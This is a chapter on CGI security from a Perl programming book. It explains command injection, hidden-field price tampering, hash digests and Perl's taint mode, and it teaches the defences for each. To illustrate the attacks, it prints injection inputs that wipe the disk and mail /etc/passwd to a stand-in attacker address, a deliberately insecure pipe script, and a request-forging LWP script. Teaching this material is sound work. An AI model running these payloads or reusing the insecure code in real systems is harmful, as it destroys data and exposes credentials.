CGI Programming with Perl, 2nd Edition

By Scott Guelich, Shishir Gundavaram, and Gunther Birznieks
2nd Edition July 2000
1-56592-419-3, Order Number: 4193
472 pages, $34.95

Chapter 8
Security

CGI programming offers you something amazing: as soon as your script is online, it is immediately available to the entire world. Anyone from almost anywhere can run the application you created on your web server. This may make you excited, but it should also make you scared. Not everyone using the Internet has honest intentions. Crackers[1] may attempt to vandalize your web pages in order to show off to friends. Competitors or investors may try to access internal information about your organization and its products.

Not all security issues involve malevolent users. The worldwide availability of your CGI script means that someone may run your script under circumstances you never imagined and certainly never tested. Your web script should not wipe out files because someone happened to enter an apostrophe in a form field, but this is possible, and issues like these also represent security concerns.

The Importance of Web Security

Many CGI developers do not take security as seriously as they should. So before we look at how to make CGI scripts more secure, let's look at why we should worry about security in the first place:

  1. On the Internet, your web site represents your public image. If your web pages are unavailable or have been vandalized, that affects others' impressions of your organization, even if the focus of your organization has nothing to do with web technology.
  2. You may have valuable information on your web server. You may have sensitive or valuable information available in a restricted area that you may wish to keep unauthorized people from accessing. For example, you may have content or services available to paying members, which you would not want non-paying customers or non-members to access. Even files that are not part of your web server's document tree and are thus not available online to anyone (e.g., credit card numbers) could be compromised.
  3. Someone who has cracked your web server has easier access to the rest of your network. If you have no valuable information on your web server, you probably cannot say that about your entire network. If someone breaks into your web server, it becomes much easier for them to break into another system on your network, especially if your web server is inside your organization's firewall (which, for this reason, is generally a bad idea).
  4. You sacrifice potential income when your system is down. If your organization generates revenue directly from your web site, you certainly lose income when your system is unavailable. However, even if you do not fall into this group, you likely offer marketing literature or contact information online. Potential customers who are unable to access this information may look elsewhere when making their decision.
  5. You waste time and resources fixing problems. You must perform many tasks when your systems are compromised. First, you must determine the extent of the damage. Then you probably need to restore from backups. You must also determine what went wrong. If a cracker gained access to your web server, then you must determine how the cracker managed this in order to prevent future break-ins. If a CGI script damaged files, then you must locate and fix the bug to prevent future problems.
  6. You expose yourself to liability. If you develop CGI scripts for other companies, and one of those CGI scripts is responsible for a large security problem, then you may understandably be liable. However, even if it is your company for whom you're developing CGI scripts, you may be liable to other parties. For example, if someone cracks your web server, they could use it as a base to stage attacks on other companies. Likewise, if your company stores information that others consider sensitive (e.g., your customers' credit card numbers), you may be liable to them if that information is leaked.

These are only some of the many reasons why web security is so important. You may be able to come up with other reasons yourself. So now that you recognize the importance of creating secure CGI scripts, you may be wondering what makes a CGI script secure. It can be summed up in one simple maxim: never trust any data coming from the user. This sounds quite simple, but in practice it's not. In the remainder of this chapter, we'll explore how to do this.

Handling User Input

Security problems arise when you make assumptions about your data: you assume that users will do what you expect, and they surprise you. Users are good at this, even when they're not trying. To write secure CGI scripts, you must also think creatively. Let's look at an example.

Calling External Applications

figlet is a fun application that allows us to create large, fancy ASCII art characters in many different sizes and styles. You can find examples of figlet output as part of people's signatures in email messages and newsgroup posts. If figlet is not on your system, you can get it from http://st-www.cs.uiuc.edu/users/chai/figlet.html.

You can execute figlet from the command line in the following manner:

$ figlet -f fonts/slant 'I Love CGI!'

And the output would be:

    ____   __                       ________________  _  _
   /  _/  / /   ____ _   _____     / ____/ __  _  _/  _/ /
   / /   / /   / _  _ \ | / / _ \   / /   / / _  _ / // /
 _/ /   / /___/ /_/ / |/ /  __/  / /_  _  _/ /_/ // //_/
/___/  /_____/\____/|___/\___/   \____/\____/_  _  _(_)

We can write a CGI gateway to figlet that allows a user to enter some text, executes a command like the one shown above, captures the output, and returns it to the browser.

First, Example 8-1 shows the HTML form.

Example 8-1: figlet.html

<html>
  <head>
    <title>Figlet Gateway</title>
  </head>
  
  <body bgcolor="#FFFFFF">
    
    <div align="center">
    <h2>Figlet Gateway</h2>
    
    <form action="/cgi/unsafe/figlet_INSECURE.cgi" method="GET">
      <p>Please enter a string to pass to figlet:
        <input type="text" name="string"></p>
      <input type="submit">
    </form>
  
  </body>
</html>

Now, Example 8-2 shows the program.

Example 8-2: figlet_INSECURE.cgi

#!/usr/bin/perl -w
 
use strict;
use CGI;
use CGIBook::Error;
 
# Constant: path to figlet
my $FIGLET = '/usr/local/bin/figlet';
 
my $q      = new CGI;
my $string = $q->param( "string" );
 
unless ( $string ) {
    error( $q, "Please enter some text to display." );
}
 
local *PIPE;
 
## This code is INSECURE...
## Do NOT use this code on a live web server!!
open PIPE, "$FIGLET \"$string\" |" or
    die "Cannot open pipe to figlet: $!";
 
print $q->header( "text/plain" );
print while <PIPE>;
close PIPE;

We first verify that the user entered a string and simply print an error if not. Then we open a pipe (notice the trailing "|" character) to the figlet command, passing it the string. By opening a pipe to another application, we can read from it as though it were a file. In this case, we can get at the figlet output by simply reading from the PIPE file handle.

We then print our content type, followed by the figlet output. Perl lets us do this on one line: the while loop reads a line from PIPE, stores it in $_, and calls print; when print is called without an argument, it outputs the value stored in $_; the loop automatically terminates when all the data has been read from figlet.
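To make the one-line idiom concrete, here is a minimal sketch of the same loop written out in full. The copy_lines name is hypothetical, and an in-memory file handle stands in for the pipe to figlet so the snippet can run on its own:

```perl
use strict;
use warnings;

# Long-hand equivalent of "print while <PIPE>;": read one line at a
# time until end of input and print each line to the output handle.
sub copy_lines {
    my ( $in, $out ) = @_;
    while ( defined( my $line = <$in> ) ) {
        print {$out} $line;
    }
}

# An in-memory file handle stands in for the figlet pipe here.
my $text = "first line\nsecond line\n";
open my $in, "<", \$text or die "Cannot open in-memory handle: $!";
copy_lines( $in, \*STDOUT );
close $in;
```

The explicit defined test is what Perl adds for you behind the scenes in the short form; without it, a final line consisting only of "0" would end the loop early.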

Admittedly, our example is somewhat dull. figlet has many options for changing the font, etc., but we want to keep our example short and simple to be able to focus on the security issues. Many people assume that it's hard for something to go wrong with scripts this simple. In fact, this CGI script allows a savvy user to execute any command on your system!

Before reading further, see if you can figure out how this example is insecure. Remember that your commands are executed with the same permissions that your web server runs as (e.g., nobody). If you want to test it on a web server, then only do so on a private web server that is not attached to the Internet! Finally, try to figure out how to fix this security problem.

The reason why we suggest that you try to find the solution yourself is that there are many possible solutions that appear secure but are not. Before we look at the solutions, let's analyze the problem. It should have been pretty obvious (if only from the comments in the code) that the culprit is the call that opens a pipe to figlet. Why is this insecure? Well, it isn't if the user does in fact pass simple words without punctuation. But if you assume this, then you are forgetting our rule: never trust any data from the user.

User Input and the Shell

You should not assume this field will contain harmless data. It could be anything. When Perl opens a pipe to an external program, it passes the command through a shell. Suppose the input were the text:

`rm -rf /`

or:

"; mail cracker@badguys.net </etc/passwd"

These commands would execute as if the following commands had been entered into a shell:

$ /usr/local/bin/figlet "`rm -rf /`"
$ /usr/local/bin/figlet ""; mail cracker@badguys.net </etc/passwd

The first command would attempt to erase every file on your server, leaving you to search for your backup tapes.[2] The second would email your system password file to someone you'd probably rather not have trying to log into your system. Windows servers are no better off; the input "| del /f /s /q c:\" would be just as catastrophic.

So what should we do? Well, the main problem is that the shell gives many characters special meaning. For example, the backtick character (`) allows you to embed one command inside another. This makes the shell powerful, but in this context, that power is dangerous. We could attempt to make a list of all the special characters. We would need to include all the characters that can cause other commands to run, that change the environment in significant ways, or terminate our intended commands and allow another command to follow.

We could change the code as follows:

my $q      = new CGI;
my $string = $q->param( "string" );
unless ( $string ) {
    error( $q, "Please enter some text to display." );
}
 
## This is an incomplete example; this is NOT a secure check
if ( $string =~ /[`\$\\"';& ... ]/ ) {
    error( $q,
        "Your text may not include these characters: `\$\\\"';& ..." );
}

This example is not complete, and we will not provide a full list of dangerous characters here. We won't create such a list because we do not trust that we will not miss something important, and that is why this is the wrong way to go about solving the problem. This solution requires you to know every possible way that the shell can execute a dangerous command. If you miss just one thing, you can be compromised.

Security Strategies

The right way is not to make a list of what to disallow. The right way is to make a list of what to allow. This makes the solution much more manageable. If you start by saying that anything goes and looking for those things that cause problems, you will spend a long time looking. There are countless combinations to check. If you say that nothing goes and then slowly add things, you can check each of these as you add them and confirm that nothing will slip past you. If you miss something, you have disallowed something you should allow, and you can correct the problem by testing it and adding it. This is a much safer way to err.

The final reason why this is the safer way to go is that security solutions should be simple. It's never a good idea to simply trust someone else who provides you a "definitive" list of something as important as dangerous shell characters to check against. You are the one who is accountable for your code, so you should fully understand why and how your code works, and not place blind faith in others.

So let's make a list of things to allow. We will allow letters, numbers, underscores, spaces, hyphens, periods, question marks, and exclamation points. That's a lot, and it should cover most of the strings that users try to convert. Let's also switch to single quotes around the argument to make things even safer. Example 8-3 provides a more secure version of our CGI script.

Example 8-3: figlet_INSECURE2.cgi

#!/usr/bin/perl -w
 
use strict;
use CGI;
use CGIBook::Error;
 
my $FIGLET = '/usr/local/bin/figlet';
 
my $q      = new CGI;
my $string = $q->param( "string" );
 
unless ( $string ) {
    error( $q, "Please enter some text to display." );
}
 
unless ( $string =~ /^[\w .!?-]+$/ ) {
    error( $q, "You entered an invalid character. " .
               "You may only enter letters, numbers, " .
               "underscores, spaces, periods, exclamation " .
               "points, question marks, and hyphens." );
}
local *PIPE;
 
## This code is more secure, but still dangerous...
## Do NOT use this code on a live web server!!
open PIPE, "$FIGLET '$string' |" or
    die "Cannot open figlet: $!";
 
print $q->header( "text/plain" );
print while <PIPE>;
close PIPE;

This code is much better. It isn't dangerous in its current form. The only problem is that someone can come along at some later point and make minor changes that could render the script insecure again. Of course, we can't cover every possibility; we have to draw the line somewhere. So are we being too critical to say the script could be more secure? Perhaps, but it is always best to be safe rather than sorry when dealing with web security. We can improve this script because there is a way to open a pipe to another process in Perl and bypass the shell altogether. All right, you say, so why didn't we say so in the first place? Unfortunately, this trick only works on those operating systems where Perl can fork, so this does not work on Win32[3] or MacOS, for example.

fork and exec

All we need to do is replace the command that opens the pipe with the following lines:

## Ahh, much safer
my $pid = open PIPE, "-|";
die "Cannot fork: $!" unless defined $pid;
 
unless ( $pid ) {
    exec $FIGLET, $string or die "Cannot exec figlet: $!";
}

This uses a special form of the open function, which implicitly tells Perl to fork and create a child process with a pipe connected to it. The child process is a copy of the current executing script and continues from the same point. However, open returns a different value for each of the forked processes: the parent receives the process identifier (PID) of the child process; the child process receives 0. If open fails to fork, it returns undef.

After verifying that the command succeeded, the child process calls exec to run figlet. exec tells Perl to replace the child process with figlet, while keeping the same environment including the pipe to the parent process. Thus, the child process becomes figlet and the parent keeps a pipe to figlet, just as if it had used the simpler open command from above.

This is obviously a little more complicated. So why all this work if we still have to call figlet from exec? Well, if you look closely, you'll notice that exec takes multiple arguments in this script. The first argument is the name of the process to run, and the remaining arguments are passed as arguments to the new process, but Perl does this without passing them through the shell. Thus, by making our code a little more complex, we can avoid a big security problem.
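As a hedged aside, Perl 5.8 and later also accept a list form of the pipe open, which performs the fork and exec in one call and likewise never hands the arguments to a shell. The sketch below is an illustration under that assumption, not the chapter's own code: the run_without_shell name is hypothetical, and the running Perl binary ($^X) stands in for figlet so the snippet does not depend on figlet being installed.

```perl
use strict;
use warnings;

# Run a command whose arguments are passed as a list, so that no shell
# ever parses them, and return everything it wrote to standard output.
sub run_without_shell {
    my @command = @_;

    # List-form pipe open: Perl forks and execs @command directly.
    open my $pipe, "-|", @command
        or die "Cannot run $command[0]: $!";
    my $output = do { local $/; <$pipe> };    # slurp all of the output
    close $pipe
        or die "Command $command[0] failed: $! (status $?)";

    return defined $output ? $output : "";
}

# Stand-in for figlet: a child perl that simply echoes its argument.
my $hostile = '`echo pwned`; echo "$HOME"';
print run_without_shell( $^X, "-e", 'print $ARGV[0]', $hostile ), "\n";
```

Because the string reaches the child process as a single argument, the backticks, semicolon, and dollar sign should come back as literal text rather than being interpreted.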

Trusting the Browser

Let's look at another common security mistake in CGI scripts. You may think that the only data coming from the user you have to validate is the data they are allowed to edit. For example, you might think that data embedded in hidden fields or select lists is safer than data in text fields because the browser doesn't allow users to edit them. Actually, these can be just as dangerous. Let's see why.

In this example, we'll look at a simple online software store. Here, each product has its own static HTML page and each page calls the same CGI script to process the transaction. In order to make the CGI script as flexible as possible, it takes the product name, quantity, and price from hidden fields in the product page. It then collects the user's credit card information, charges the card for the full amount, and allows the user to download the software.

Example 8-4 shows a sample product page.

Example 8-4: sb3000_INSECURE.html

<html>
  <head>
    <title>Super Blaster 3000</title>
  </head>
  
  <body bgcolor="#FFFFFF">
    <h2>Super Blaster 3000</h2>
    <hr>
    
    <form action="https://localhost/cgi/buy.cgi" method="GET">
      <input type="hidden" name="price" value="30.00">
      <input type="hidden" name="name" value="Super Blaster 3000">
      
      <p>Experience Super Blaster 3000, the hot new game that 
        everyone is talking about! You can't find it in stores, so
        order your copy here today. Just a quick download and you 
        can be playing it all night!</p>
      
      <p>The price is $30.00 (USD) per license. Enter the number
        of licenses you want, then click the <i>Order</i> button to 
        enter your order information.</p>
      
      <p>Number of Licenses: 
        <input type="text" name="quantity" value="1" size="8"></p>
      <input type="submit" name="submit" value="Order">
      
    </form>
  </body>
</html>

We don't need to look at the CGI script in this example, because the problem isn't what it does, it's how it's called. For now, we're interested in the form, and the security problem here is the price. The price is in a hidden field, so the form should not allow users to change the price. You may have noticed, however, that because the form is submitted via GET, the parameters will be clearly visible in the URL in your browser window. The previous example with one license generates the following URL (ignore the line break):

https://localhost/cgi/buy.cgi?price=30.00&
name=Super+Blaster+3000&quantity=1&submit=Order

By modifying this URL, it is possible to change the price to anything and call the CGI script with this new value.

Do not be deceived into thinking that you can solve this problem by changing the request method to POST. Many web developers use POST even when it is not appropriate (see "GET versus POST" in Chapter 2, The Hypertext Transport Protocol) because they believe it makes their scripts more secure against URL tampering. This is false security. First of all, CGI.pm, like most modules that parse form input, does not differentiate between data obtained via POST or GET. Just because you change your form to call the script via POST does not mean that the user cannot manually construct a query string to call your script via GET instead. To prevent this, you could insert code like this:

unless ( $ENV{REQUEST_METHOD} eq "POST" ) {
    error( $q, "Invalid request method." );
}

However, the user can always copy your form to their own system. Then they can change the price to be an editable text field in their copy of the form and submit it to your CGI. Nothing inherent to HTTP prevents an HTML form on one server from calling a CGI script on another server. In fact, a CGI script cannot reliably determine what form was used to submit data to it. Many web developers attempt to use the HTTP_REFERER environment variable to check where form input came from. You can do so like this:

my $server = quotemeta( $ENV{HTTP_HOST} || $ENV{SERVER_NAME} );
unless ( $ENV{HTTP_REFERER} =~ m|^https?://$server/| ) {
    error( $q, "Invalid referring URL." );
}

The problem here is that you have gone from trusting the user to trusting the user's browser. Don't do this. If the user is surfing with Netscape or Internet Explorer, you may be okay. It is possible that a bug could cause the browser to send the wrong referring URL, but this is unlikely. However, whoever said that users had to use one of these browsers?

There are many web browsers available, and some are far more configurable than Netscape and Internet Explorer. Did you know that Perl even has its own web client of sorts? The LWP module allows you to create and send HTTP requests easily from within Perl. The requests are fully customizable, so you can include whatever HTTP headers you wish, including Referer and User-Agent. The following code would allow someone to easily bypass all the security checks we've listed earlier:

#!/usr/bin/perl -w
 
use strict;
 
use LWP::UserAgent;
use HTTP::Request;
use HTTP::Headers;
use CGI;
 
my $q = new CGI( {
    price    => 0.01,
    name     => "Super Blaster 3000",
    quantity => 1,
    submit   => "Order",
} );
 
my $form_data = $q->query_string;
 
my $headers = new HTTP::Headers(
    Accept       => "text/html, text/plain, image/*",
    Referer      => "http://localhost/products/sb3000.html",
    Content_Type => "application/x-www-form-urlencoded"
);
 
my $request = new HTTP::Request(
    "POST",
    "https://localhost/cgi/buy.cgi",
    $headers
);
 
$request->content( $form_data );
 
my $agent = new LWP::UserAgent;
$agent->agent( "Mozilla/4.5" );
my $response = $agent->request( $request );
 
print $response->content;

We're not going to review how this code works now, although we'll discuss LWP in Chapter 14, Middleware and XML. Right now, the important thing to understand is that you can't trust any data that comes from the user, and you can't trust the browser to protect you from the user. It's trivially easy for someone with a little knowledge and a little ingenuity to provide you with any input they want.

Encryption

Encryption can be an effective tool when developing secure solutions. There are two scenarios where it is especially useful for web applications. The first is to protect sensitive data so that it cannot be intercepted and viewed by others. A secure https connection using SSL (or TLS) provides this protection. The second scenario involves validation, such as ensuring that the user has not tampered with the values of hidden fields in a form. This is handled by generating hashes, or digests, that can be used like checksums to verify that the data matches what is expected.

You could use a hash algorithm, such as MD5 or SHA-1, to secure Example 8-4. You would do this by generating a digest for both the data on the page--the product name and price--and a secret phrase stored on the server:

use constant SECRET_PHRASE => "ThIs phrAsE ShOUld bE DiFFiCUlT 2 gueSS.";
my $digest = generate_digest( $name, $price, SECRET_PHRASE );

You could then insert the value of the digest into your form as an additional hidden field, as shown in Example 8-5.

Example 8-5: sb3000.html

<html>
  <head>
    <title>Super Blaster 3000</title>
  </head>
  
  <body bgcolor="#FFFFFF">
    <h2>Super Blaster 3000</h2>
    <hr>
    
    <form action="https://localhost/cgi/buy.cgi" method="GET">
      <input type="hidden" name="price" value="30.00">
      <input type="hidden" name="name" value="Super Blaster 3000">
      <input type="hidden" name="digest"
        value="a38b37b5c80a79d2efb31ad78e9b8361">
      .
      .

When the CGI script receives the input, it recalculates a digest from the product's name and price along with the secret phrase. If it matches the digest that was supplied from the form, then the user has not modified the data.
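The generate_digest function is not defined in the text, so the following is only a minimal sketch of what it and the matching check might look like, assuming MD5 via Digest::MD5 and a "|" delimiter between fields. The fields_unmodified name, the delimiter, and the sample secret are all assumptions made for illustration.

```perl
use strict;
use warnings;
use Digest::MD5 qw( md5_hex );

# Hypothetical helper: digest the visible fields together with the
# secret. The "|" delimiter keeps ( "ab", "c" ) from producing the
# same digest as ( "a", "bc" ).
sub generate_digest {
    my ( $name, $price, $secret ) = @_;
    return md5_hex( join "|", $name, $price, $secret );
}

# Recompute the digest from the submitted fields and compare it with
# the digest that came back from the form.
sub fields_unmodified {
    my ( $name, $price, $digest, $secret ) = @_;
    return 0 unless defined $digest;
    return generate_digest( $name, $price, $secret ) eq lc $digest ? 1 : 0;
}

my $secret = "example secret phrase";    # placeholder, not a real secret
my $digest = generate_digest( "Super Blaster 3000", "30.00", $secret );

for my $price ( "30.00", "0.01" ) {
    my $ok = fields_unmodified( "Super Blaster 3000", $price, $digest, $secret );
    print "price $price: ", ( $ok ? "accepted" : "rejected" ), "\n";
}
```

A user who changes the price cannot produce a matching digest without knowing the secret phrase, which is why the phrase must never appear in the page itself.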

The value of your secret phrase must not be easy to guess, and it should be protected on your server. Like passwords and other sensitive data, you may wish to place your secret phrase in a file outside of your CGI directory and document root and have your CGI scripts read this value when it is needed. This way, if a misconfiguration in your web server allows users to view the source of your CGI scripts, then your secret phrase would not be compromised.
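Reading the phrase from a file could look something like the sketch below. The read_secret name is hypothetical, and the path shown in the comment is a placeholder rather than a recommended location:

```perl
use strict;
use warnings;

# Read the secret phrase from the first line of a file that lives
# outside the CGI directory and the document root.
sub read_secret {
    my $path = shift;

    open my $fh, "<", $path
        or die "Cannot open secret file: $!";
    my $secret = <$fh>;
    close $fh;

    die "Secret file is empty\n" unless defined $secret;
    chomp $secret;
    return $secret;
}

# Hypothetical usage; the path is an assumption:
# my $secret = read_secret( "/usr/local/etc/store/secret_phrase" );
```

The file should be readable by the user the web server runs as and by as few other accounts as possible.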

In this example, the simplest solution may be to simply look up the prices on the server and not pass them through hidden fields, but there are certainly circumstances when you must expose data like this, and digests are an effective way to verify your data.
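A rough sketch of the server-side lookup follows. The %PRICE table and the order_total function are hypothetical; a real store would more likely read prices from a database or configuration file.

```perl
use strict;
use warnings;

# Hypothetical server-side price list, keyed by product name.
my %PRICE = ( "Super Blaster 3000" => 30.00 );

# Compute the order total from the product name and quantity only;
# any price submitted by the browser is ignored. Returns nothing for
# an unknown product or a quantity that is not a positive integer.
sub order_total {
    my ( $name, $quantity ) = @_;
    return unless defined $name     && exists $PRICE{$name};
    return unless defined $quantity && $quantity =~ /^[1-9]\d*\z/;
    return $PRICE{$name} * $quantity;
}

my $total = order_total( "Super Blaster 3000", 2 );
printf "Total: %.2f\n", $total if defined $total;
```

With this approach the only values taken from the form are the product name and the quantity, and both are checked against what the server already knows or allows.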

Now let's look at how to actually generate digests. We will look at two algorithms: MD5 and SHA-1.

MD5

MD5 is a 128-bit, one-way hash algorithm. It produces a short message digest for your data that is extremely unlikely to be produced for other data. However, from a digest it is not possible to derive the original data. The Digest::MD5 module allows you to create MD5 digests in Perl.[4]

The digest that Digest::MD5 generates for you is available in three different formats: as raw binary data, converted to hexadecimal, and converted to Base64 format. The latter two formats produce longer strings, but they can be safely inserted within HTML, email, etc. The hexadecimal digest is 32 characters; the Base64 digest is 22 characters. Base64 encoding uses characters A-Z, a-z, 0-9, +, /, and =.

You can use the Digest::MD5 module this way to generate a hexadecimal digest:

use Digest::MD5 qw( md5_hex );
my $hex_digest = md5_hex( @data );

You can use the Digest::MD5 module this way to generate a Base64 digest:

use Digest::MD5 qw( md5_base64 );
my $base64_digest = md5_base64( @data );
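The short sketch below compares the three formats for the same data. The digest_lengths name and the sample values are made up for illustration. It also shows a detail worth knowing: the Digest::MD5 functions concatenate their arguments before hashing, so list boundaries are not part of the digest.

```perl
use strict;
use warnings;
use Digest::MD5 qw( md5 md5_hex md5_base64 );

# Return the length of each digest format for the same input data.
sub digest_lengths {
    my @data = @_;
    return (
        binary => length( md5( @data ) ),
        hex    => length( md5_hex( @data ) ),
        base64 => length( md5_base64( @data ) ),
    );
}

my %length = digest_lengths( "Super Blaster 3000", "30.00" );
print "$_: $length{$_} characters\n" for sort keys %length;

# Arguments are joined with no separator, so these two calls agree.
print "same digest\n" if md5_hex( "ab", "c" ) eq md5_hex( "a", "bc" );
```

If the boundaries between fields matter, join the values with a delimiter of your own before passing them in.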

It is still possible for someone who has a digest and who knows possible original values to generate digests for each of the possible values to compare against the target digest. Thus, if you wish to generate digests that cannot be guessed, you should supply data that varies enough to not be predictable.

The MD5 algorithm has received criticism within the last few years because researchers discovered internal weaknesses, which may make it easier to find different sets of data that produce the same digest. No one has done this, because it is still quite challenging, but the challenge looks smaller than previously assumed, and it may happen in the near future. This does not mean that it is any easier for someone to generate the original data from a digest, only that it may eventually be possible to calculate other data that collides with the digest. The SHA-1 algorithm does not currently have this problem.

SHA-1

Digest::SHA1, which is distributed with Digest::MD5, provides an interface to the 160-bit SHA-1 algorithm. It is considered more secure than MD5, but it does take longer to generate. You can use it just like Digest::MD5:

use Digest::SHA1 qw( sha1_hex sha1_base64 );
my $hex_digest    = sha1_hex( @data );
my $base64_digest = sha1_base64( @data );

Hexadecimal SHA-1 digests are 40 characters; Base64 digests are 27 characters.
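If Digest::SHA1 is not installed, the Digest::SHA module that ships with more recent versions of Perl exports functions with the same names. The sketch below assumes Digest::SHA is available and is meant only to confirm the digest lengths; the sha1_digests name is hypothetical.

```perl
use strict;
use warnings;
use Digest::SHA qw( sha1_hex sha1_base64 );    # assumption: Digest::SHA is installed

# Return the hexadecimal and Base64 SHA-1 digests of the same data.
sub sha1_digests {
    my @data = @_;
    return ( sha1_hex( @data ), sha1_base64( @data ) );
}

my ( $hex, $base64 ) = sha1_digests( "Super Blaster 3000", "30.00" );
printf "hex: %d characters, base64: %d characters\n",
    length $hex, length $base64;
```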

Perl's Taint Mode

If you have been paying close attention, you may have noticed that the example scripts in this chapter are all a little different from previous examples. The difference appears at the end of the first line. All of our prior examples have had this as the first line:

#!/usr/bin/perl -wT

In this chapter, they have started like this:

#!/usr/bin/perl -w

The difference is the -T option, which enables Perl's taint mode. Taint mode tells Perl to keep track of data that comes from the user and avoid doing anything insecure with it. Because our examples in this chapter intentionally showed insecure ways of doing things, they wouldn't have worked with the -T flag, so we omitted it. From this it should be clear, however, that taint mode is generally a very good thing.

The purpose of taint mode is to prevent any data from outside your application from affecting anything else external to your application. Thus, Perl will not allow user-inputted values to be used in an eval, passed through a shell, or used in any of the Perl commands that affect external files and processes. It was created for situations when security is important, such as writing Perl programs that run as root or CGI scripts. You should always use taint mode in your CGI scripts.

How Taint Works

When taint mode is enabled, Perl monitors every variable to see if it is tainted. Tainted data, according to Perl, is any data that comes from outside your code. Because this includes anything read from STDIN (or any other file input) as well as all environment variables, this covers everything your CGI script receives from the user.

Not only does Perl keep track of whether variables are tainted or not, but that taintedness follows the data in the variable around if you try to assign it to another variable. For example, because it is an environment variable, Perl considers the HTTP request method stored in $ENV{REQUEST_METHOD} to be tainted. If you then assign this to another variable, that variable also becomes tainted.

my $method = $ENV{REQUEST_METHOD};

Here $method also becomes tainted. It does not matter whether the expression is simple or complex. If a tainted value is used in an expression, then the result of that expression is also tainted, and any variable it is assigned to will also become tainted.

You can use this subroutine to test whether a variable is tainted.[5] It returns a true or false value:

sub is_tainted {
    my $var = shift;
    my $blank = substr( $var, 0, 0 );
    return not eval { eval "1 || $blank" || 1 };
}

We set $blank to a zero-length substring of the variable we're testing. If the value is tainted and we are running in taint mode, Perl will throw an error when we evaluate this in the quoted expression on the following line. This error is caught by the outer eval, which then returns undef. If the variable is not tainted or we are not running in taint mode, then the expression within the outer eval evaluates to 1. The not reverses the resulting values.
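As an alternative sketch, the Scalar::Util module provides a tainted function that answers the same question. The example below is an illustration only: the taint_report name is hypothetical, and it uses $ENV{PATH} as a sample of outside data. Run it with perl -T to see the taint flag follow a value through an expression; without -T, nothing is reported as tainted.

```perl
use strict;
use warnings;
use Scalar::Util qw( tainted );

# Report whether taint mode is on, and whether a value taken from the
# environment and a value derived from it carry the taint flag.
sub taint_report {
    my $source  = defined $ENV{PATH} ? $ENV{PATH} : "";
    my $derived = "prefix:" . lc $source;    # any expression using $source

    return {
        taint_mode => ${^TAINT}            ? 1 : 0,
        source     => tainted( $source )   ? 1 : 0,
        derived    => tainted( $derived )  ? 1 : 0,
    };
}

my $report = taint_report();
printf "taint mode: %d, source tainted: %d, derived tainted: %d\n",
    @{$report}{ qw( taint_mode source derived ) };
```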

What Is Monitored by Taint Mode

One of the great benefits of using taint mode is that you don't have to try to understand all the technical details about how Perl's guts do the work. As we have seen, Perl sometimes passes expressions through an external shell to help it interpret arguments to system calls. There are even more subtle situations when Perl will invoke a shell, but you don't need to worry about mapping all of these instances out, because taint mode recognizes them for you.

The basic rule, as we have said, is that Perl considers any action that could modify resources outside the script subject to enforcement. Thus, you may open a file using a tainted filename and read from it as long as you did so in read-only mode. However, if you try to open the file to write to it, using a tainted filename, Perl will abort with an error.

How Taintedness Is Removed

Taint mode would be much too restrictive if there were no way to untaint your data. Of course, you do not want to untaint data without checking it to verify that it is safe. Fortunately, one command can accomplish both of these tasks. It turns out that Perl does allow one expression involving tainted values to evaluate to an untainted value. If you match a variable with a regular expression, then the pattern match variables that correspond to the matched parentheses (e.g., $1, $2, etc.) are untainted. If, for example, you wanted to get a particular filename from the user while making sure that it doesn't include a full path (so the user cannot write to a file outside the directory you are intending), you could untaint the user input this way:

$q->param( "filename" ) =~ /^([\w.]+)$/;
my $filename = $1;
 
unless ( $filename ) {
    .
    .
    .

You can reduce the first two lines to one line because a regular expression match returns a list of matches, and these are also untainted:

my( $filename ) = $q->param( "filename" ) =~ /^([\w.]+)$/;
 
unless ( $filename ) {
    .
    .
    .

You have seen this notation previously in many of our examples. Note that because the result of the regular expression is a list, you must include parentheses around $filename to evaluate it in a list context. Otherwise, the match is evaluated in scalar context, and $filename will be set to 1 if the match succeeded (or to an empty string if it failed) rather than to the captured text.

Allowing versus disallowing

Remember what we said previously. It is generally better to determine what characters to allow than to try to determine what not to allow. Build your untaint regular expressions with this in mind. In this example, we only allowed letters, numbers, underscores, and periods in the filename, which is much simpler than scanning against possible file path delimiters.
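The same allow-list idea can be wrapped in a small helper. The sketch below is slightly stricter than the pattern in the text, and both differences are assumptions of this example rather than requirements: it insists that the name begin with a letter, number, or underscore (so "." and ".." are rejected), and it anchors with \z instead of $ so that a trailing newline does not slip through. The untaint_filename name is hypothetical.

```perl
use strict;
use warnings;

# Return an untainted copy of a simple filename, or undef if the value
# contains anything other than letters, numbers, underscores, and
# periods, or if it begins with a period.
sub untaint_filename {
    my $value = shift;
    return undef unless defined $value;

    my ( $filename ) = $value =~ /^(\w[\w.]*)\z/;
    return $filename;    # undef when the pattern did not match
}

for my $candidate ( "report.txt", "../etc/passwd", ".." ) {
    my $clean = untaint_filename( $candidate );
    print "$candidate: ", ( defined $clean ? "accepted" : "rejected" ), "\n";
}
```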

Why Use Taint Mode?

Perl's taint mode doesn't do anything for you that you can't do for yourself. It simply monitors the data and stops you if you're in danger of shooting yourself in the foot. You could be careful on your own, but it certainly helps to have Perl do its best to help. In general, the best argument for using taint mode is simply to turn the question around and ask "Why not use taint mode?"

Many CGI developers can come up with excuses for not using taint mode, but none of them really hold water. Some may find it too difficult or complicated to deal with the restrictions that taint mode imposes. This is generally because they don't fully understand how taint mode works and they find it easier to turn it off than to learn how to fix the problems Perl is trying to point out (see the next section for some help).

Other developers may argue that taint mode slows their scripts down more than they can afford. Believe it or not, taint mode does not significantly slow down your scripts. If you are concerned about performance, don't implicitly assume that taint mode must slow down your code. Use the Benchmark module and test the difference; you may be surprised at the results. We'll discuss how to use the Benchmark module in Chapter 17, Efficiency and Optimization.
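As a rough starting point, you could time a fresh interpreter with and without the -T flag. This sketch measures only the startup of a trivial one-line program, so it says nothing about your own code; to test a real script, replace the '-e', '1' arguments with the script's path. The subroutine name compare_startup and the iteration count are our choices:

```perl
use strict;
use warnings;
use Benchmark qw(timethese timestr);

# Start a fresh interpreter on each iteration, much as a web server does for
# each CGI request. $^X is the path of the perl running this script.
sub compare_startup {
    my ( $count ) = @_;
    return timethese( $count, {
        plain => sub { system( $^X, '-e', '1' ) },
        taint => sub { system( $^X, '-T', '-e', '1' ) },
    }, 'none' );    # 'none' suppresses Benchmark's own report
}

my $results = compare_startup( 20 );

for my $name ( sort keys %$results ) {
    printf "%-6s %s\n", $name, timestr( $results->{$name} );
}
```

With so few iterations the numbers will be noisy; raise the count until repeated runs give similar results.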

The final reason to use taint mode is that CGI scripts rarely remain unchanged. Bugs are fixed, new features are added, and even though the original code may have been perfectly safe, someone may accidentally change all that. You can think of taint mode as an ongoing security audit that Perl provides for free.

Common Problems with Taint Mode

